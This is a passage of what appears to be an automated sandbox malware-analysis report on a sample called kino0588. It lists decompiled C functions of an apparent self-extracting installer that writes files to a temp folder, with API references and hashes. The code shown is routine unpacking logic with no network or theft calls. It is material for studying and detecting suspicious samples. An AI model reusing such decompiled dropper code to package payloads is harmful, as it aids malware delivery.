				return E00196CE0(_t23, _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}













                                                                                                                                                                                                                                    0x001919e0
                                                                                                                                                                                                                                    0x001919e0
                                                                                                                                                                                                                                    0x001919eb
                                                                                                                                                                                                                                    0x001919f2
                                                                                                                                                                                                                                    0x001919f9
                                                                                                                                                                                                                                    0x001919fc
                                                                                                                                                                                                                                    0x00191a01
                                                                                                                                                                                                                                    0x00191a2a
                                                                                                                                                                                                                                    0x00191a2e
                                                                                                                                                                                                                                    0x00191a3e
                                                                                                                                                                                                                                    0x00191a4f
                                                                                                                                                                                                                                    0x00191a62
                                                                                                                                                                                                                                    0x00191a6a
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00191a03
                                                                                                                                                                                                                                    0x00191a06
                                                                                                                                                                                                                                    0x00191a20
                                                                                                                                                                                                                                    0x00191a20
                                                                                                                                                                                                                                    0x00191a08
                                                                                                                                                                                                                                    0x00191a08
                                                                                                                                                                                                                                    0x00191a14
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00191a16
                                                                                                                                                                                                                                    0x00191a18
                                                                                                                                                                                                                                    0x00191a70
                                                                                                                                                                                                                                    0x00191a72
                                                                                                                                                                                                                                    0x00191a72
                                                                                                                                                                                                                                    0x00191a14
                                                                                                                                                                                                                                    0x00191a06
                                                                                                                                                                                                                                    0x00191a81

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • EndDialog.USER32(?,?), ref: 00191A18
                                                                                                                                                                                                                                    • GetDesktopWindow.USER32 ref: 00191A24
                                                                                                                                                                                                                                    • LoadStringA.USER32(?,?,00000200), ref: 00191A4F
                                                                                                                                                                                                                                    • SetDlgItemTextA.USER32(?,0000083F,00000000), ref: 00191A62
                                                                                                                                                                                                                                    • MessageBeep.USER32(000000FF), ref: 00191A6A
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.330753364.0000000000191000.00000020.00000001.01000000.00000006.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330744972.0000000000190000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330761280.0000000000198000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330767264.000000000019A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330767264.000000000019C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_190000_kino0588.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: BeepDesktopDialogItemLoadMessageStringTextWindow
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 1273765764-0
                                                                                                                                                                                                                                    • Opcode ID: 4a8111b8a41db25a23f2c7693a4c6a909e7432cda3c195bc4e9bdf1d463e7e47
                                                                                                                                                                                                                                    • Instruction ID: c0aade9cb5f0e9720dfc6daaee1a619c4a1b2c869d3ff69f6d67d1c13939963e
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4a8111b8a41db25a23f2c7693a4c6a909e7432cda3c195bc4e9bdf1d463e7e47
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8F11A13160115AAFDF10EF68ED08AAE77B8EF49300F508166F91293590DB30AE85CBD5
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 001963C0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 69fileCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 88%
                                                                                                                                                                                                                                    			E001963C0(void* __ecx, void* __eflags, long _a4, intOrPtr _a12, void* _a16) {
				signed int _v8;
				char _v268;
				long _v272;
				void* _v276;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t15;
				long _t28;
				struct _OVERLAPPED* _t37;
				void* _t39;
				signed int _t40;

				_t15 =  *0x198004; // 0x21bd9a3c
				_v8 = _t15 ^ _t40;
				_v272 = _v272 & 0x00000000;
				_push(__ecx);
				_v276 = _a16;
				_t37 = 1;
				E00191781( &_v268, 0x104, __ecx, "C:\Users\hardz\AppData\Local\Temp\IXP003.TMP\");
				E0019658A( &_v268, 0x104, _a12);
				_t28 = 0;
				_t39 = CreateFileA( &_v268, 0x40000000, 0, 0, 2, 0x80, 0);
				if(_t39 != 0xffffffff) {
					_t28 = _a4;
					if(WriteFile(_t39, _v276, _t28,  &_v272, 0) == 0 || _t28 != _v272) {
						 *0x199124 = 0x80070052;
						_t37 = 0;
					}
					CloseHandle(_t39);
				} else {
					 *0x199124 = 0x80070052;
					_t37 = 0;
				}
				return E00196CE0(_t37, _t28, _v8 ^ _t40, 0x104, _t37, _t39);
			}















                                                                                                                                                                                                                                    0x001963cb
                                                                                                                                                                                                                                    0x001963d2
                                                                                                                                                                                                                                    0x001963d8
                                                                                                                                                                                                                                    0x001963ea
                                                                                                                                                                                                                                    0x001963f3
                                                                                                                                                                                                                                    0x00196401
                                                                                                                                                                                                                                    0x00196402
                                                                                                                                                                                                                                    0x00196410
                                                                                                                                                                                                                                    0x00196415
                                                                                                                                                                                                                                    0x00196433
                                                                                                                                                                                                                                    0x00196438
                                                                                                                                                                                                                                    0x00196449
                                                                                                                                                                                                                                    0x00196463
                                                                                                                                                                                                                                    0x0019646d
                                                                                                                                                                                                                                    0x00196477
                                                                                                                                                                                                                                    0x00196477
                                                                                                                                                                                                                                    0x0019647a
                                                                                                                                                                                                                                    0x0019643a
                                                                                                                                                                                                                                    0x0019643a
                                                                                                                                                                                                                                    0x00196444
                                                                                                                                                                                                                                    0x00196444
                                                                                                                                                                                                                                    0x00196492

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,?,C:\Users\user\AppData\Local\Temp\IXP003.TMP\), ref: 0019642D
                                                                                                                                                                                                                                    • WriteFile.KERNEL32(00000000,?,?,00000000,00000000,?,C:\Users\user\AppData\Local\Temp\IXP003.TMP\), ref: 0019645B
                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,C:\Users\user\AppData\Local\Temp\IXP003.TMP\), ref: 0019647A
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    • C:\Users\user\AppData\Local\Temp\IXP003.TMP\, xrefs: 001963EB
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.330753364.0000000000191000.00000020.00000001.01000000.00000006.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330744972.0000000000190000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330761280.0000000000198000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330767264.000000000019A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330767264.000000000019C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_190000_kino0588.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: File$CloseCreateHandleWrite
                                                                                                                                                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\IXP003.TMP\
                                                                                                                                                                                                                                    • API String ID: 1065093856-256195474
                                                                                                                                                                                                                                    • Opcode ID: f4cf87940e3ebafd92554b87e416e2b8774ab75349360e09723748bddbdbd657
                                                                                                                                                                                                                                    • Instruction ID: 215df7ea05c569bf96a1465d7abfc66090fa77c19f3a7f9525171f2ddf02a02b
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f4cf87940e3ebafd92554b87e416e2b8774ab75349360e09723748bddbdbd657
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4C21D571A00218ABDB10DF65DC85FEB7378EB59314F0041AAF585A3180DBB06DC58FB5
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 001947E0 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 64memoryCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                    			E001947E0(intOrPtr* __ecx) {
				intOrPtr _t6;
				intOrPtr _t9;
				void* _t11;
				void* _t19;
				intOrPtr* _t22;
				void _t24;
				struct HWND__* _t25;
				struct HWND__* _t26;
				void* _t27;
				intOrPtr* _t28;
				intOrPtr* _t33;
				void* _t34;

				_t33 = __ecx;
				_t34 = LocalAlloc(0x40, 8);
				if(_t34 != 0) {
					_t22 = _t33;
					_t27 = _t22 + 1;
					do {
						_t6 =  *_t22;
						_t22 = _t22 + 1;
					} while (_t6 != 0);
					_t24 = LocalAlloc(0x40, _t22 - _t27 + 1);
					 *_t34 = _t24;
					if(_t24 != 0) {
						_t28 = _t33;
						_t19 = _t28 + 1;
						do {
							_t9 =  *_t28;
							_t28 = _t28 + 1;
						} while (_t9 != 0);
						E00191680(_t24, _t28 - _t19 + 1, _t33);
						_t11 =  *0x1991e0; // 0x2818f08
						 *(_t34 + 4) = _t11;
						 *0x1991e0 = _t34;
						return 1;
					}
					_t25 =  *0x198584; // 0x0
					E001944B9(_t25, 0x4b5, _t8, _t8, 0x10, _t8);
					LocalFree(_t34);
					L2:
					return 0;
				}
				_t26 =  *0x198584; // 0x0
				E001944B9(_t26, 0x4b5, _t5, _t5, 0x10, _t5);
				goto L2;
			}















                                                                                                                                                                                                                                    0x001947e8
                                                                                                                                                                                                                                    0x001947f0
                                                                                                                                                                                                                                    0x001947f4
                                                                                                                                                                                                                                    0x0019480f
                                                                                                                                                                                                                                    0x00194811
                                                                                                                                                                                                                                    0x00194814
                                                                                                                                                                                                                                    0x00194814
                                                                                                                                                                                                                                    0x00194816
                                                                                                                                                                                                                                    0x00194817
                                                                                                                                                                                                                                    0x00194829
                                                                                                                                                                                                                                    0x0019482b
                                                                                                                                                                                                                                    0x0019482f
                                                                                                                                                                                                                                    0x0019484f
                                                                                                                                                                                                                                    0x00194852
                                                                                                                                                                                                                                    0x00194855
                                                                                                                                                                                                                                    0x00194855
                                                                                                                                                                                                                                    0x00194857
                                                                                                                                                                                                                                    0x00194858
                                                                                                                                                                                                                                    0x00194860
                                                                                                                                                                                                                                    0x00194865
                                                                                                                                                                                                                                    0x0019486a
                                                                                                                                                                                                                                    0x0019486f
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00194876
                                                                                                                                                                                                                                    0x00194831
                                                                                                                                                                                                                                    0x00194841
                                                                                                                                                                                                                                    0x00194847
                                                                                                                                                                                                                                    0x0019480b
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0019480b
                                                                                                                                                                                                                                    0x001947f6
                                                                                                                                                                                                                                    0x00194806
                                                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • LocalAlloc.KERNEL32(00000040,00000008,?,00000000,00194E6F), ref: 001947EA
                                                                                                                                                                                                                                    • LocalAlloc.KERNEL32(00000040,?), ref: 00194823
                                                                                                                                                                                                                                    • LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000), ref: 00194847
                                                                                                                                                                                                                                      • Part of subcall function 001944B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00194518
                                                                                                                                                                                                                                      • Part of subcall function 001944B9: MessageBoxA.USER32(?,?,doza2,00010010), ref: 00194554
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    • C:\Users\user\AppData\Local\Temp\IXP003.TMP\, xrefs: 00194851
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.330753364.0000000000191000.00000020.00000001.01000000.00000006.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330744972.0000000000190000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330761280.0000000000198000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330767264.000000000019A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330767264.000000000019C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_190000_kino0588.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Local$Alloc$FreeLoadMessageString
                                                                                                                                                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\IXP003.TMP\
                                                                                                                                                                                                                                    • API String ID: 359063898-256195474
                                                                                                                                                                                                                                    • Opcode ID: 51bfb9b1f86c1ccad3f45b98c5550c662e9d30e75cfb8437a675d00cbfd79f1d
                                                                                                                                                                                                                                    • Instruction ID: 3a418f6f011a02b2b96f898401bee8bbdb84f16e05d78ddfac50cb40aba13a09
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 51bfb9b1f86c1ccad3f45b98c5550c662e9d30e75cfb8437a675d00cbfd79f1d
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FE1125B56046416FEF288F649C18F763B5AEB86310B04852AFA828B741DB359C4B8660
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 00196517 Relevance: 6.1, APIs: 4, Instructions: 51COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 77%
                                                                                                                                                                                                                                    			E00196517(void* __ecx, CHAR* __edx, struct HWND__* _a4, _Unknown_base(*)()* _a8, intOrPtr _a12, int _a16) {
				struct HRSRC__* _t6;
				void* _t21;
				struct HINSTANCE__* _t23;
				int _t24;

				_t23 =  *0x199a3c; // 0x190000
				_t6 = FindResourceA(_t23, __edx, 5);
				if(_t6 == 0) {
					L6:
					E001944B9(0, 0x4fb, 0, 0, 0x10, 0);
					_t24 = _a16;
				} else {
					_t21 = LoadResource(_t23, _t6);
					if(_t21 == 0) {
						goto L6;
					} else {
						if(_a12 != 0) {
							_push(_a12);
						} else {
							_push(0);
						}
						_t24 = DialogBoxIndirectParamA(_t23, _t21, _a4, _a8);
						FreeResource(_t21);
						if(_t24 == 0xffffffff) {
							goto L6;
						}
					}
				}
				return _t24;
			}







                                                                                                                                                                                                                                    0x0019651f
                                                                                                                                                                                                                                    0x0019652a
                                                                                                                                                                                                                                    0x00196534
                                                                                                                                                                                                                                    0x0019656b
                                                                                                                                                                                                                                    0x00196577
                                                                                                                                                                                                                                    0x0019657c
                                                                                                                                                                                                                                    0x00196536
                                                                                                                                                                                                                                    0x0019653e
                                                                                                                                                                                                                                    0x00196542
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00196544
                                                                                                                                                                                                                                    0x00196547
                                                                                                                                                                                                                                    0x0019654c
                                                                                                                                                                                                                                    0x00196549
                                                                                                                                                                                                                                    0x00196549
                                                                                                                                                                                                                                    0x00196549
                                                                                                                                                                                                                                    0x0019655e
                                                                                                                                                                                                                                    0x00196560
                                                                                                                                                                                                                                    0x00196569
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00196569
                                                                                                                                                                                                                                    0x00196542
                                                                                                                                                                                                                                    0x00196587

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • FindResourceA.KERNEL32(00190000,000007D6,00000005), ref: 0019652A
                                                                                                                                                                                                                                    • LoadResource.KERNEL32(00190000,00000000,?,?,00192EE8,00000000,001919E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 00196538
                                                                                                                                                                                                                                    • DialogBoxIndirectParamA.USER32(00190000,00000000,00000547,001919E0,00000000), ref: 00196557
                                                                                                                                                                                                                                    • FreeResource.KERNEL32(00000000,?,?,00192EE8,00000000,001919E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 00196560
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.330753364.0000000000191000.00000020.00000001.01000000.00000006.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330744972.0000000000190000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330761280.0000000000198000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330767264.000000000019A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330767264.000000000019C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_190000_kino0588.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Resource$DialogFindFreeIndirectLoadParam
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 1214682469-0
                                                                                                                                                                                                                                    • Opcode ID: f3441d2d2c32ae1d54b44c3bcd17f10b52fc4a6cbe05f08cc99cce76630e7fbc
                                                                                                                                                                                                                                    • Instruction ID: dbae37cf576cf8f8033666b28711f34bc5f64d4304d1294135bf192f61e525f0
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f3441d2d2c32ae1d54b44c3bcd17f10b52fc4a6cbe05f08cc99cce76630e7fbc
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 00014972100605BBEF105F69AC08DBB7A6CEF857A0F06012AFE0093150D771CC50C6F1
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 00193680 Relevance: 6.1, APIs: 4, Instructions: 51windowCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                    			E00193680(void* __ecx) {
				void* _v8;
				struct tagMSG _v36;
				int _t8;
				struct HWND__* _t16;

				_v8 = __ecx;
				_t16 = 0;
				while(1) {
					_t8 = MsgWaitForMultipleObjects(1,  &_v8, 0, 0xffffffff, 0x4ff);
					if(_t8 == 0) {
						break;
					}
					if(PeekMessageA( &_v36, 0, 0, 0, 1) == 0) {
						continue;
					} else {
						do {
							if(_v36.message != 0x12) {
								DispatchMessageA( &_v36);
							} else {
								_t16 = 1;
							}
							_t8 = PeekMessageA( &_v36, 0, 0, 0, 1);
						} while (_t8 != 0);
						if(_t16 == 0) {
							continue;
						}
					}
					break;
				}
				return _t8;
			}







                                                                                                                                                                                                                                    0x0019368c
                                                                                                                                                                                                                                    0x0019368f
                                                                                                                                                                                                                                    0x00193691
                                                                                                                                                                                                                                    0x0019369f
                                                                                                                                                                                                                                    0x001936a7
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x001936ba
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x001936bc
                                                                                                                                                                                                                                    0x001936bc
                                                                                                                                                                                                                                    0x001936c0
                                                                                                                                                                                                                                    0x001936cb
                                                                                                                                                                                                                                    0x001936c2
                                                                                                                                                                                                                                    0x001936c4
                                                                                                                                                                                                                                    0x001936c4
                                                                                                                                                                                                                                    0x001936da
                                                                                                                                                                                                                                    0x001936e0
                                                                                                                                                                                                                                    0x001936e6
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x001936e6
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x001936ba
                                                                                                                                                                                                                                    0x001936ed

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 0019369F
                                                                                                                                                                                                                                    • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 001936B2
                                                                                                                                                                                                                                    • DispatchMessageA.USER32(?), ref: 001936CB
                                                                                                                                                                                                                                    • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 001936DA
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.330753364.0000000000191000.00000020.00000001.01000000.00000006.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330744972.0000000000190000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330761280.0000000000198000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330767264.000000000019A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330767264.000000000019C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_190000_kino0588.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Message$Peek$DispatchMultipleObjectsWait
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 2776232527-0
                                                                                                                                                                                                                                    • Opcode ID: 88712dba3f33d6f456741b48fe1a43deae495a5cdb4d65bf7666ab326de093a8
                                                                                                                                                                                                                                    • Instruction ID: 3d176b49f8537123045881edb4632937d1e20d985c2acfb9c79907c6dc24197d
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 88712dba3f33d6f456741b48fe1a43deae495a5cdb4d65bf7666ab326de093a8
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3C01677290025577DF304BA65C4CEEB767CEBC5B10F14012AF925E2184D661CB84C6B1
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 001965E8 Relevance: 6.0, APIs: 4, Instructions: 46COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 72%
                                                                                                                                                                                                                                    			E001965E8(char* __ecx) {
				char _t3;
				char _t10;
				char* _t12;
				char* _t14;
				char* _t15;
				CHAR* _t16;

				_t12 = __ecx;
				_t15 = __ecx;
				_t14 =  &(__ecx[1]);
				_t10 = 0;
				do {
					_t3 =  *_t12;
					_t12 =  &(_t12[1]);
				} while (_t3 != 0);
				_push(CharPrevA(__ecx, _t12 - _t14 + __ecx));
				while(1) {
					_t16 = CharPrevA(_t15, ??);
					if(_t16 <= _t15) {
						break;
					}
					if( *_t16 == 0x5c) {
						L7:
						if(_t16 == _t15 ||  *(CharPrevA(_t15, _t16)) == 0x3a) {
							_t16 = CharNextA(_t16);
						}
						 *_t16 = _t10;
						_t10 = 1;
					} else {
						_push(_t16);
						continue;
					}
					L11:
					return _t10;
				}
				if( *_t16 == 0x5c) {
					goto L7;
				}
				goto L11;
			}









                                                                                                                                                                                                                                    0x001965e8
                                                                                                                                                                                                                                    0x001965ed
                                                                                                                                                                                                                                    0x001965ef
                                                                                                                                                                                                                                    0x001965f2
                                                                                                                                                                                                                                    0x001965f4
                                                                                                                                                                                                                                    0x001965f4
                                                                                                                                                                                                                                    0x001965f6
                                                                                                                                                                                                                                    0x001965f7
                                                                                                                                                                                                                                    0x00196608
                                                                                                                                                                                                                                    0x00196611
                                                                                                                                                                                                                                    0x00196618
                                                                                                                                                                                                                                    0x0019661c
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0019660e
                                                                                                                                                                                                                                    0x00196623
                                                                                                                                                                                                                                    0x00196625
                                                                                                                                                                                                                                    0x0019663b
                                                                                                                                                                                                                                    0x0019663b
                                                                                                                                                                                                                                    0x0019663d
                                                                                                                                                                                                                                    0x00196641
                                                                                                                                                                                                                                    0x00196610
                                                                                                                                                                                                                                    0x00196610
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00196610
                                                                                                                                                                                                                                    0x00196644
                                                                                                                                                                                                                                    0x00196647
                                                                                                                                                                                                                                    0x00196647
                                                                                                                                                                                                                                    0x00196621
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • CharPrevA.USER32(?,00000000,00000000,00000001,00000000,00192B33), ref: 00196602
                                                                                                                                                                                                                                    • CharPrevA.USER32(?,00000000), ref: 00196612
                                                                                                                                                                                                                                    • CharPrevA.USER32(?,00000000), ref: 00196629
                                                                                                                                                                                                                                    • CharNextA.USER32(00000000), ref: 00196635
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.330753364.0000000000191000.00000020.00000001.01000000.00000006.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330744972.0000000000190000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330761280.0000000000198000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330767264.000000000019A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330767264.000000000019C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_190000_kino0588.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Char$Prev$Next
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 3260447230-0
                                                                                                                                                                                                                                    • Opcode ID: 85c4325ff605ebcf8e3ebb744e5d874c0766e7193e2dbe951f0429b3d7de2cbc
                                                                                                                                                                                                                                    • Instruction ID: 1b2f10dc36591ad57d26012705872fc139c9c14a7f0b41cdfda455dc5038ae23
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 85c4325ff605ebcf8e3ebb744e5d874c0766e7193e2dbe951f0429b3d7de2cbc
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F6F028320041506EEF321B298C88DBBBF9CDF87364B2A01BFE59582401D7150D4A86B1
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 001969B0 Relevance: 6.0, APIs: 4, Instructions: 25COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                    			E001969B0() {
				intOrPtr* _t4;
				intOrPtr* _t5;
				void* _t6;
				intOrPtr _t11;
				intOrPtr _t12;

				 *0x1981f8 = E00196C70();
				__set_app_type(E00196FBE(2));
				 *0x1988a4 =  *0x1988a4 | 0xffffffff;
				 *0x1988a8 =  *0x1988a8 | 0xffffffff;
				_t4 = __p__fmode();
				_t11 =  *0x198528; // 0x0
				 *_t4 = _t11;
				_t5 = __p__commode();
				_t12 =  *0x19851c; // 0x0
				 *_t5 = _t12;
				_t6 = E00197000();
				if( *0x198000 == 0) {
					__setusermatherr(E00197000);
				}
				E001971EF(_t6);
				return 0;
			}








                                                                                                                                                                                                                                    0x001969b7
                                                                                                                                                                                                                                    0x001969c2
                                                                                                                                                                                                                                    0x001969c8
                                                                                                                                                                                                                                    0x001969cf
                                                                                                                                                                                                                                    0x001969d8
                                                                                                                                                                                                                                    0x001969de
                                                                                                                                                                                                                                    0x001969e4
                                                                                                                                                                                                                                    0x001969e6
                                                                                                                                                                                                                                    0x001969ec
                                                                                                                                                                                                                                    0x001969f2
                                                                                                                                                                                                                                    0x001969f4
                                                                                                                                                                                                                                    0x00196a00
                                                                                                                                                                                                                                    0x00196a07
                                                                                                                                                                                                                                    0x00196a0d
                                                                                                                                                                                                                                    0x00196a0e
                                                                                                                                                                                                                                    0x00196a15

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                      • Part of subcall function 00196FBE: GetModuleHandleW.KERNEL32(00000000), ref: 00196FC5
                                                                                                                                                                                                                                    • __set_app_type.MSVCRT ref: 001969C2
                                                                                                                                                                                                                                    • __p__fmode.MSVCRT ref: 001969D8
                                                                                                                                                                                                                                    • __p__commode.MSVCRT ref: 001969E6
                                                                                                                                                                                                                                    • __setusermatherr.MSVCRT ref: 00196A07
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.330753364.0000000000191000.00000020.00000001.01000000.00000006.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330744972.0000000000190000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330761280.0000000000198000.00000004.00000001.01000000.00000006.sdmpDownload File
